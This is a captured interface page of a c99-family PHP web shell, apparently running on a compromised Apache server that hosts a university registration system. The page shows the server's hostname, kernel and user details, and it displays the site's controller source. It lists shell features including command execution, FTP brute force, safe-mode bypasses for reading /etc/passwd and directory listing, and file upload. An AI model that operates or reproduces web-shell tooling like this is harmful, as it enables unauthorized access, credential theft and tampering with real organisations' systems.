!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/eregis/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mua_controller.php (5.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * System in Educational Enterprise Resource Planning System
 *
 * LICENSE
 *
 * This source file is subject to the GPL license that is bundled
 * with this package in the file licence.txt.
 *
 * @package        System in Educational Enterprise Resource Planning System
 * @subpackage    Registration System
 * @copyright      Copyright (C) 2011 by Information System Engineering Research Labolatory, Burapha University
                http://iserl.buu.ac.th
                iserl.callcenter@gmail.com
 * @license        http://cvs.buu.ac.th/mis/license.php GNU GPL v1
 * @author         Information System Engineering Research Labolatory, Burapha University
 *
 *
 */
?>
<?php
ini_set
("display_errors"1);
require(
'application/controllers/my_controller.php');
class 
Mua_Controller extends My_controller {
    public 
$contents;

    public function 
__construct() {
        
parent::__construct();
        
$this->db $this->load->database('mua'TRUE);
    }
    
    function 
output($v$blog='') {
        
/*
                if($this->session->userdata('logged_in')) {
                    $data = '';
                    if($this->session->userdata('sysinfo'))
                        $data['mmn'] = $this->genMn();
                    
                    $mn['menu'] = $this->load->view('info/v_postlogin',$data,true);
                }
                else
                    $mn['menu'] = $this->load->view('info/v_prelogin','',true);
        */
                
$this->load->model($this->config->item("ums_folder").'mo_crud','crud');
                
$this->load->model($this->config->item("rg_folder").'mo_rg_config','cfg');
                
$this->load->model($this->config->item("rg_folder").'mo_rg_acadconfig','ac');
        
                
$this->contents['oCRUD'] = $this->crud;
        
                
$qu_cfg $this->cfg->qryCfg();
                if(
$qu_cfg && $qu_cfg->num_rows()) {
                    if(
$row $qu_cfg->row()) {
                        
//$mn['system_logo'] = $row->cfgSiteLogo;
                        
$mn['system_name'] = $row->cfgSiteName;
                        
/*$mn['system_banner'] = $row->cfgSiteBanner;
                        $mn['clgCode'] = $row->cfgCgCode;
                        $mn['clgName'] = $row->cfgCgName;
                        $mn['clgNameE'] = $row->cfgCgNameE;
                        $mn['clgAddr'] = $row->cfgCgAddr;
                        $mn['clgPhoneNo'] = $row->cfgCgPhoneNo;
                        $mn['clgBankName'] = $row->cfgCgBankName;
                        $mn['clgBankAccountName'] = $row->cfgCgBankAccountName;
                        $mn['clgBankNo'] = $row->cfgCgBankNo;
                        $mn['clgBankLogo'] = $row->cfgCgBankLogo;
                        $mn['clgBankFee'] = $row->cfgCgBankFee;
                        $mn['clgInstituteLogo'] = $row->cfgInstituteLogo;
                        $mn['clgInstitute'] = $row->cfgInstitute;
                        $mn['clgInstituteEng'] = $row->cfgInstituteEng;
                        $mn['clgMinistry'] = $row->cfgMinistry;
                        $mn['clgMinistryEng'] = $row->cfgMinistryEng;*/
                        
$this->contents['table_color_even'] = $row->cfgBgClTrAndTd;
                        
$this->contents['tr_color_even'] = $row->cfgBgClSwapTr;
                        
$this->contents['font_color_table'] = $row->cfgFnClHeadTb;
                        
$this->contents['font_color_err'] = $row->cfgFnClErrSpec;
                    }
                } else {
                    
$mn['system_name'] = '';
                    
$this->contents['table_color_even'] = $this->config->item('rg_table_color2');
                    
$this->contents['tr_color_even'] = $this->config->item('rg_line_color_even');
                    
$this->contents['font_color_table'] = $this->config->item('rg_text_head_tb');
                    
$this->contents['font_color_err'] = $this->config->item('rg_font_color_err');
                }
        
                
//$qu_ac = $this->ac->qryAc();
                
$qu_ac $this->ac->qryAcPrsIdRegistrarJoinPrs();
                if(
$qu_ac && $qu_ac->num_rows()) {
                    if(
$row $qu_ac->row()) {
                        
$this->contents['acExitExam'] = $row->acExitExam;
                        
$this->contents['acNoLockT'] = $row->acNoLockT;
                        
$this->contents['acCardExpiryDay'] = $row->acCardExpiryDay;
                        
$this->contents['acCardExpiryMonth'] = $row->acCardExpiryMonth;
                        
$this->contents['TSREGISTAR'] = $row->TSRegistrar;
                        
$this->contents['DIRECTOR'] = $row->Director;
                        
$this->contents['acPrsIdDirector'] = $row->acPrsIdDirector;
                    }
                } else {
                        
$this->contents['acExitExam'] = '';
                        
$this->contents['acNoLockT'] = '';
                        
$this->contents['acCardExpiryDay'] = '';
                        
$this->contents['acCardExpiryMonth'] = '';
                        
$this->contents['TSREGISTAR'] = '';
                        
$this->contents['DIRECTOR'] = '';
                        
$this->contents['acPrsIdDirector'] = '';
                }
                
                
/*$lv['head'] = $this->load->view($this->config->item("rg_folder").'v_header',$mn,true);
                $lv['body'] = $this->load->view($v,$this->contents,true);
                $lv['footer'] = $this->load->view('info/v_footer','',true);
                
                $this->load->view('info/v_in',$lv);*/
        
                
if($blog!='') {
                    
$msg['blog'] = $blog;
                    
$this->blog $this->load->view('info/v_blog',$msg,true);
                }
        
                
$this->body $this->load->view($this->config->item("rg_folder").'v_header_js',$this->contents,true);
                
$this->body .= $this->load->view($v,'',true);
                
$this->show();
            }
        
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0107 ]--